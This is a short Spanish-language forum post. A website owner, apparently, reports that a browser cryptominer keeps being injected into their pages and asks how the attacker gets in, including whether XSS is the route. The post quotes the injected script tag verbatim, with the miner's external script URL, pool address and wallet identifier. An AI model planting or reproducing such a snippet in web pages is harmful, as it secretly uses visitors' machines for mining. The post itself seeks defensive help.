Recientemente me di cuenta de que seguí JavaScript en varias de mis páginas (generalmente antes de cerrar la etiqueta del cuerpo):
<script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptoknight.cc:9221"></script><scripttype="text/javascript">PerfektStart('46PgJtwUkg18z7Cu7xAd2F972GSEQUzoGHWP4fwUHbdj7qgZqhf27Pm7Y7BdMUH2gahQdrCmbKxNuJAyUrGfThnhCgEyinb', 'x');throttleMiner = 50;</script>
Me doy cuenta de que alguien está poniendo cryptominer en mis páginas. Si lo elimino varios días después, vuelve.
Mi pregunta es, ¿cómo es posible que un atacante inyecte código directamente en el documento? ¿No necesitaría las credenciales del servidor para acceder y editar archivos en el servidor?
¿Es esto posible con ataques XSS?